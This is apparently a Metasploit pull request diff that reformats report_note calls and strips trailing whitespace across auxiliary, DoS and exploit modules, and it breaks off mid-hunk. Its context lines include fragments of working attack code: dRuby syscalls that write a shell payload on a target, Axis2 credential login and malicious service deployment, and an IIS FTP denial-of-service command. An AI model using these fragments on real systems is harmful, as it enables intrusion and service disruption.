### PR TITLE
Solved most of msftidy issues with the /modules directory

### DIFF
--- a/modules/auxiliary/admin/oracle/oraenum.rb
+++ b/modules/auxiliary/admin/oracle/oraenum.rb
@@ -58,7 +58,15 @@ class Metasploit3 < Msf::Auxiliary
 		print_status("The versions of the Components are:")
 		ver.each do |v|
 			print_status("\t#{v.chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{v.chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Component Version: #{v.chomp}",
+				:update => :unique_data
+			)
 		end
 
 		#Saving Major Release Number for other checks
@@ -70,18 +78,50 @@ class Metasploit3 < Msf::Auxiliary
 		begin
 			if vparm["audit_trail"] == "NONE"
 				print_status("\tDatabase Auditing is not enabled!")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Trail: Disabled", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Audit Trail: Disabled",
+					:update => :unique_data
+				)
 			else
 				print_status("\tDatabase Auditing is enabled!")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit Trail: Enabled", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Audit Trail: Enabled",
+					:update => :unique_data
+				)
 			end
 
 			if vparm["audit_sys_operations"] == "FALSE"
 				print_status("\tAuditing of SYS Operations is not enabled!")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit SYS Ops: Disabled", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Audit SYS Ops: Disabled",
+					:update => :unique_data
+				)
 			else
 				print_status("\tAuditing of SYS Operations is enabled!")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Audit SYS Ops: Enabled", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Audit SYS Ops: Enabled",
+					:update => :unique_data
+				)
 			end
 
 		end
@@ -93,10 +133,26 @@ class Metasploit3 < Msf::Auxiliary
 
 			if vparm["sql92_security"] == "FALSE"
 				print_status("\tSQL92 Security restriction on SELECT is not Enabled")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "SQL92: Disabled", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "SQL92: Disabled",
+					:update => :unique_data
+				)
 			else
 				print_status("\tSQL92 Security restriction on SELECT is Enabled")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "SQL92: Enabled", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "SQL92: Enabled",
+					:update => :unique_data
+				)
 			end
 
 			# check for encryption of logins on version before 10g
@@ -104,10 +160,26 @@ class Metasploit3 < Msf::Auxiliary
 			if majorrel.join.to_i < 10
 				if vparm["dblink_encrypt_login"] == "FALSE"
 					print_status("\tLink Encryption for Logins is not Enabled")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Link Encryption: Disabled", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Link Encryption: Disabled",
+						:update => :unique_data
+					)
 				else
 					print_status("\tLink Encryption for Logins is Enabled")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Link Encryption: Enabled", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Link Encryption: Enabled",
+						:update => :unique_data
+					)
 				end
 			end
 
@@ -145,7 +217,15 @@ class Metasploit3 < Msf::Auxiliary
 			|
 			lockout = prepare_exec(query)
 			print_status("\tCurrent Account Lockout Time is set to #{lockout[0].chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Lockout Time: #{lockout[0].chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Account Lockout Time: #{lockout[0].chomp}",
+				:update => :unique_data
+			)
 
 		rescue => e
 			if e.to_s =~ /ORA-00942: table or view does not exist/
@@ -162,7 +242,15 @@ class Metasploit3 < Msf::Auxiliary
 			|
 			failed_logins = prepare_exec(query)
 			print_status("\tThe Number of Failed Logins before an account is locked is set to #{failed_logins[0].chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Fail Logins Permitted: #{failed_logins[0].chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Account Fail Logins Permitted: #{failed_logins[0].chomp}",
+				:update => :unique_data
+			)
 
 		rescue => e
 			if e.to_s =~ /ORA-00942: table or view does not exist/
@@ -179,7 +267,15 @@ class Metasploit3 < Msf::Auxiliary
 			|
 			grace_time = prepare_exec(query)
 			print_status("\tThe Password Grace Time is set to #{grace_time[0].chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account Password Grace Time: #{grace_time[0].chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Account Password Grace Time: #{grace_time[0].chomp}",
+				:update => :unique_data
+			)
 
 		rescue => e
 			if e.to_s =~ /ORA-00942: table or view does not exist/
@@ -196,7 +292,15 @@ class Metasploit3 < Msf::Auxiliary
 			|
 			passlife_time = prepare_exec(query)
 			print_status("\tThe Lifetime of Passwords is set to #{passlife_time[0].chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Life Time: #{passlife_time[0].chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Password Life Time: #{passlife_time[0].chomp}",
+				:update => :unique_data
+			)
 
 		rescue => e
 			if e.to_s =~ /ORA-00942: table or view does not exist/
@@ -213,7 +317,15 @@ class Metasploit3 < Msf::Auxiliary
 			|
 			passreuse = prepare_exec(query)
 			print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Reuse Time: #{passreuse[0].chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Password Reuse Time: #{passreuse[0].chomp}",
+				:update => :unique_data
+			)
 
 		rescue => e
 			if e.to_s =~ /ORA-00942: table or view does not exist/
@@ -230,7 +342,15 @@ class Metasploit3 < Msf::Auxiliary
 			|
 			passreusemax = prepare_exec(query)
 			print_status("\tThe Maximum Number of Times a Password needs to be changed before it can be reused is set to #{passreusemax[0].chomp}")
-			report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}", :update => :unique_data)
+			report_note(
+				:host => datastore['RHOST'],
+				:proto => 'tcp',
+				:sname => 'TNS',
+				:port => datastore['RPORT'],
+				:type => 'ORA_ENUM',
+				:data => "Password Maximun Reuse Time: #{passreusemax[0].chomp}",
+				:update => :unique_data
+			)
 			print_status("\tThe Number of Times a Password can be reused is set to #{passreuse[0].chomp}")
 
 		rescue => e
@@ -249,10 +369,26 @@ class Metasploit3 < Msf::Auxiliary
 			passrand = prepare_exec(query)
 			if passrand[0] =~ /NULL/
 				print_status("\tPassword Complexity is not checked")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Complexity is not being checked for new passwords", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Password Complexity is not being checked for new passwords",
+					:update => :unique_data
+				)
 			else
 				print_status("\tPassword Complexity is being checked")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Password Complexity is being checked for new passwords", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Password Complexity is being checked for new passwords",
+					:update => :unique_data
+				)
 			end
 
 		rescue => e
@@ -276,7 +412,15 @@ class Metasploit3 < Msf::Auxiliary
 				print_status("Active Accounts on the System in format Username,Hash are:")
 				activeacc.each do |aa|
 					print_status("\t#{aa.chomp}")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Active Account #{aa.chomp}",
+						:update => :unique_data
+					)
 				end
 			else
 				query = %Q|
@@ -288,7 +432,15 @@ class Metasploit3 < Msf::Auxiliary
 				print_status("Active Accounts on the System in format Username,Password,Spare4 are:")
 				activeacc.each do |aa|
 					print_status("\t#{aa.chomp}")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{aa.chomp}", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Active Account #{aa.chomp}",
+						:update => :unique_data
+					)
 				end
 			end
 
@@ -309,7 +461,15 @@ class Metasploit3 < Msf::Auxiliary
 				print_status("Expired or Locked Accounts on the System in format Username,Hash are:")
 				disabledacc.each do |da|
 					print_status("\t#{da.chomp}")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Disabled Account #{da.chomp}",
+						:update => :unique_data
+					)
 				end
 			else
 				query = %Q|
@@ -321,7 +481,15 @@ class Metasploit3 < Msf::Auxiliary
 				print_status("Expired or Locked Accounts on the System in format Username,Password,Spare4 are:")
 				disabledacc.each do |da|
 					print_status("\t#{da.chomp}")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{da.chomp}", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Disabled Account #{da.chomp}",
+						:update => :unique_data
+					)
 				end
 			end
 
@@ -341,7 +509,15 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("Accounts with DBA Privilege  in format Username,Hash on the System are:")
 			dbaacc.each do |dba|
 				print_status("\t#{dba.chomp}")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with DBA Priv  #{dba.chomp}", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Account with DBA Priv  #{dba.chomp}",
+					:update => :unique_data
+				)
 			end
 
 		rescue => e
@@ -360,7 +536,14 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("Accounts with Alter System Privilege on the System are:")
 			altersys.each do |as|
 				print_status("\t#{as.chomp}")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with ALTER SYSTEM Priv  #{as.chomp}", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Account with ALTER SYSTEM Priv  #{as.chomp}",
+					:update => :unique_data)
 			end
 
 		rescue => e
@@ -379,7 +562,15 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("Accounts with JAVA ADMIN Privilege on the System are:")
 			javaacc.each do |j|
 				print_status("\t#{j.chomp}")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with JAVA ADMIN Priv  #{j.chomp}", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Account with JAVA ADMIN Priv  #{j.chomp}",
+					:update => :unique_data
+				)
 			end
 
 		rescue => e
@@ -399,7 +590,15 @@ class Metasploit3 < Msf::Auxiliary
 			print_status("Accounts that have CREATE LIBRARY Privilege on the System are:")
 			libpriv.each do |lp|
 				print_status("\t#{lp.chomp}")
-				report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with CREATE LIBRARY Priv  #{lp.chomp}", :update => :unique_data)
+				report_note(
+					:host => datastore['RHOST'],
+					:proto => 'tcp',
+					:sname => 'TNS',
+					:port => datastore['RPORT'],
+					:type => 'ORA_ENUM',
+					:data => "Account with CREATE LIBRARY Priv  #{lp.chomp}",
+					:update => :unique_data
+				)
 			end
 
 		rescue => e
@@ -418,7 +617,15 @@ class Metasploit3 < Msf::Auxiliary
 				defpwd = prepare_exec(query)
 				defpwd.each do |dp|
 					print_status("\tThe account #{dp.chomp} has a default password.")
-					report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'TNS', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Account with Default Password #{dp.chomp}", :update => :unique_data)
+					report_note(
+						:host => datastore['RHOST'],
+						:proto => 'tcp',
+						:sname => 'TNS',
+						:port => datastore['RPORT'],
+						:type => 'ORA_ENUM',
+						:data => "Account with Default Password #{dp.chomp}",
+						:update => :unique_data
+					)
 				end
 
 			else
@@ -445,11 +652,11 @@ class Metasploit3 < Msf::Auxiliary
 							:port => datastore['RPORT'],
 							:type => 'ORA_ENUM',
 							:data => "Account with Default Password #{accrcrd[0]} is #{accrcrd[1]}",
-							:update => :unique_data)
+							:update => :unique_data
+						)
 					end
 				end
 			end
 		end
 	end
-
 end

--- a/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb
+++ b/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 			'DisclosureDate' => 'Sep 03 2009'))
 	end
 
-	def run	
+	def run
 		#Attempt to crash IIS FTP
 		begin
 			return unless connect_login
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
 				end
 			end
 
-			print_status("Sending DoS packets ...")	
+			print_status("Sending DoS packets ...")
 			res = send_cmd_datax(['ls','-R */../'],' ')
 			disconnect
 		rescue ::Interrupt

--- a/modules/auxiliary/scanner/http/axis_login.rb
+++ b/modules/auxiliary/scanner/http/axis_login.rb
@@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run_host(ip)
-	
+
 		print_status("Verifying login exists at #{target_url}")
 		begin
 			res = send_request_cgi({
@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 			print_error("The Axis2 login page does not exist at #{target_url}")
 			return
 		end
-	
+
 		print_status "#{target_url} - Apache Axis - Attempting authentication"
 
 		each_user_pass { |user, pass|

--- a/modules/auxiliary/scanner/http/ssl.rb
+++ b/modules/auxiliary/scanner/http/ssl.rb
@@ -57,7 +57,7 @@ class Metasploit4 < Msf::Auxiliary
 				caissuer = (/CA Issuers - URI:(.*?),/i).match(cert.extensions.to_s)
 
 				if caissuer.to_s.empty?
-					print_good("Certificate contains no CA Issuers extension... possible self signed certificate") 
+					print_good("Certificate contains no CA Issuers extension... possible self signed certificate")
 				else
 					print_status("#{ip}:#{rport} " +caissuer.to_s[0..-2])
 				end

--- a/modules/auxiliary/scanner/misc/redis_server.rb
+++ b/modules/auxiliary/scanner/misc/redis_server.rb
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'       => [ 'iallison <ian[at]team-allison.com>' ],
 			'License'      => MSF_LICENSE
-		 ))
+		))
 
 		register_options(
 			[
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary
 			disconnect
 
 		rescue ::Exception => e
-			print_error "Unable to connect: #{e.to_s}" 
+			print_error "Unable to connect: #{e.to_s}"
 		end
 	end
 end

--- a/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
+++ b/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb
@@ -88,7 +88,14 @@ class Metasploit3 < Msf::Auxiliary
 					res.body = res.bufq
 				end
 				sid = res.body.scan(/<GLOBAL_NAME>(\S+)<\/GLOBAL_NAME>/)[0]
-				report_note(:host => ip, :proto	=> 'tcp', :port => datastore['RPORT'], :type => 'SERVICE_NAME', :data => "#{sid}", :update => :unique_data)
+				report_note(
+					:host => ip,
+					:proto	=> 'tcp',
+					:port => datastore['RPORT'],
+					:type => 'SERVICE_NAME',
+					:data => "#{sid}",
+					:update => :unique_data
+				)
 				print_good("Discovered SID: '#{sid[0]}' for host #{ip}:#{datastore['RPORT']} with #{datastore['DBUSER']} / #{datastore['DBPASS']}")
 				users.push(user_pass)
 			else
@@ -125,7 +132,15 @@ class Metasploit3 < Msf::Auxiliary
 						p = e.elements['PRODUCT'].get_text
 						v = e.elements['VERSION'].get_text
 						s = e.elements['STATUS'].get_text
-						report_note(:host => datastore['RHOST'], :sname => 'XDB', :proto => 'tcp', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{p}#{v}", :update => :unique_data)
+						report_note(
+							:host => datastore['RHOST'],
+							:sname => 'XDB',
+							:proto => 'tcp',
+							:port => datastore['RPORT'],
+							:type => 'ORA_ENUM',
+							:data => "Component Version: #{p}#{v}",
+							:update => :unique_data
+						)
 						print_good("\t#{p}\t\t#{v}\t(#{s})")
 
 					end
@@ -155,7 +170,15 @@ class Metasploit3 < Msf::Auxiliary
 					doc.elements.each('ALL_REGISTRY_BANNERS/ROW') do |e|
 						next if e.elements['BANNER'] == nil
 						b = e.elements['BANNER'].get_text
-						report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Component Version: #{b}", :update => :unique_data)
+						report_note(
+							:host => datastore['RHOST'],
+							:proto => 'tcp',
+							:sname => 'XDB',
+							:port => datastore['RPORT'],
+							:type => 'ORA_ENUM',
+							:data => "Component Version: #{b}",
+							:update => :unique_data
+						)
 						print_good("\t#{b}")
 					end
 				end
@@ -195,7 +218,15 @@ class Metasploit3 < Msf::Auxiliary
 
 						if(sid and sid != "")
 							print_good("\tLink: #{d}\t#{us}\@#{h[0]}/#{sid[0]}")
-							report_note(:host => h[0], :proto => 'tcp', :port => datastore['RPORT'], :sname => 'XDB', :type => 'oracle_sid', :data => "#{sid}", :update => :unique_data)
+							report_note(
+								:host => h[0],
+								:proto => 'tcp',
+								:port => datastore['RPORT'],
+								:sname => 'XDB',
+								:type => 'oracle_sid',
+								:data => "#{sid}",
+								:update => :unique_data
+							)
 						else
 							print_good("\tLink: #{d}\t#{us}\@#{h}")
 						end
@@ -233,9 +264,25 @@ class Metasploit3 < Msf::Auxiliary
 					print_good("\t#{us}:#{h}:#{as}")
 					good = true
 					if(as.to_s == "OPEN")
-						report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Active Account #{u}:#{h}:#{as}", :update => :unique_data)
+						report_note(
+							:host => datastore['RHOST'],
+							:proto => 'tcp',
+							:sname => 'XDB',
+							:port => datastore['RPORT'],
+							:type => 'ORA_ENUM',
+							:data => "Active Account #{u}:#{h}:#{as}",
+							:update => :unique_data
+						)
 					else
-						report_note(:host => datastore['RHOST'], :proto => 'tcp', :sname => 'XDB', :port => datastore['RPORT'], :type => 'ORA_ENUM', :data => "Disabled Account #{u}:#{h}:#{as}", :update => :unique_data)
+						report_note(
+							:host => datastore['RHOST'],
+							:proto => 'tcp',
+							:sname => 'XDB',
+							:port => datastore['RPORT'],
+							:type => 'ORA_ENUM',
+							:data => "Disabled Account #{u}:#{h}:#{as}",
+							:update => :unique_data
+						)
 					end
 				end
 			end

--- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
+++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb
@@ -112,12 +112,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			1,		# Sequence Number (must be the lowest seen from Source ID)
 			33		# Execute (pass message to destination)
 		].pack("CCNC") + packet
-		
+
 		data = [ simple_checksum(header) ].pack("n") + header
 		enc  = blowfish_encrypt("123456789ABCDEF0123456789ABCDEF0", data)
-		
+
 		udp_sock.put("\x01" + enc)
-		
+
 		handler
 		disconnect_udp
 	end

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	def initialize(info = {})
-		super(update_info(info,	
+		super(update_info(info,
 			'Name'           => 'Distributed Ruby Send instance_eval/syscall Code Execution',
 			'Description'    => %q{
 				This module exploits remote code execution vulnerabilities in dRuby
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DisclosureDate' => 'Mar 23 2011',
 			'DefaultTarget' => 0))
 
-			
+
 			register_options(
 				[
 					OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
@@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		serveruri = datastore['URI']
-		DRb.start_service	
+		DRb.start_service
 		p = DRbObject.new_with_uri(serveruri)
 		class << p
 			undef :send
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				# it's getpid on 32bit which will succeed, and writev on 64bit
 				# which will fail due to missing args
 				j = p.send(:syscall,20)
-				# syscall open		
+				# syscall open
 				i =  p.send(:syscall,8,filename,0700)
 				# syscall write
 				p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			# not vulnerable
 			rescue SecurityError => e
-			
+
 				print_status('target is not vulnerable')
 
 			# likely 64bit system

--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				signed applet is presented to the victim via a web page with
 				an applet tag.  The victim's JVM will pop a dialog asking if
 				they trust the signed applet.
-				
+
 				On older versions the dialog will display the value of CERTCN
 				in the "Publisher" line.  Newer JVMs display "UNKNOWN" when the
 				signature is not trusted (i.e., it's not signed by a trusted
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultTarget'  => 1,
 			'DisclosureDate' => 'Feb 19 1997'
 		))
-		
+
 		register_options( [
 			OptString.new('CERTCN', [ true,
 				"The CN= value for the certificate. Cannot contain ',' or '/'",

--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -24,19 +24,19 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'          => 'Axis2 / SAP BusinessObjects Authenticated Code Execution (via SOAP)',
 			'Version'       => '$Revision$',
-			'Description'	=> %q{
-					This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
+			'Description'   => %q{
+				This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
 				and uploads and executes commands via deploying a malicious web service by using SOAP.
 			},
-			'References'  =>
+			'References' =>
 				[
 					# General
 					[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
 					[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
 					[ 'CVE', '2010-0219' ],
 				],
-			'Platform'	=> [ 'java', 'win', 'linux' ], # others?
-			'Targets'	 =>
+			'Platform'      => [ 'java', 'win', 'linux' ], # others?
+			'Targets' =>
 				[
 					[ 'Java', {
 							'Arch' => ARCH_JAVA,
@@ -186,13 +186,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		p = /Please enable REST/
 		1.upto 5 do
 			Rex::ThreadSafe.sleep(3)
-			
+
 			if (res_rest and res_rest.code == 200 and res_rest.body.match(p) != nil)
 				# Try to execute the payload
 				res = send_request_raw({
-					'uri'		  => "/#{rpath}/services/#{name}",
-					'method'	   => 'POST',
-					'data'	  => data,
+					'uri'     => "/#{rpath}/services/#{name}",
+					'method'  => 'POST',
+					'data'    => data,
 					'headers' =>
 						{
 							'Content-Length' => data.length,
@@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			else
 				## rest
 				res = send_request_raw({
-					'uri'    => "/#{rpath}/services/#{name}/run",
+					'uri'     => "/#{rpath}/services/#{name}/run",
 					'method'  => 'GET',
 					'headers' =>
 					{
@@ -266,43 +266,43 @@ class Metasploit3 < Msf::Exploit::Remote
 		rescue ::Rex::ConnectionError
 			print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin Unable to attempt authentication")
 		end
-	
+
 
 		if not success and rpath != '/dswsbobje'
-            rpath = '/dswsbobje'
-            begin
-                res = send_request_cgi(
-                    {
-                        'method' => 'POST',
-                        'uri'   => "/#{rpath}/axis2-admin/login",
-                        'ctype'  => 'application/x-www-form-urlencoded',
-                        'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
-                    }, 25)
+			rpath = '/dswsbobje'
+			begin
+				res = send_request_cgi(
+					{
+						'method' => 'POST',
+						'uri'	=> "/#{rpath}/axis2-admin/login",
+						'ctype'	 => 'application/x-www-form-urlencoded',
+						'data'	 => "userName=#{user}&password=#{pass}&submit=+Login+",
+					}, 25)
 
-                if not (res.kind_of? Rex::Proto::Http::Response)
-                    print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin not responding")
-                end
+				if not (res.kind_of? Rex::Proto::Http::Response)
+					print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin not responding")
+				end
 
-                if res.code == 404
-                    print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin returned code 404")
-                end
+				if res.code == 404
+					print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin returned code 404")
+				end
 
-                srvhdr = res.headers['Server']
-                if res.code == 200
-                    # Could go with res.headers["Server"] =~ /Apache-Coyote/i
-                    # as well but that seems like an element someone's more
-                    # likely to change
+				srvhdr = res.headers['Server']
+				if res.code == 200
+					# Could go with res.headers["Server"] =~ /Apache-Coyote/i
+					# as well but that seems like an element someone's more
+					# likely to change
 
-                    success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
-                    if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
-                        session = $1
-                    end
-                end
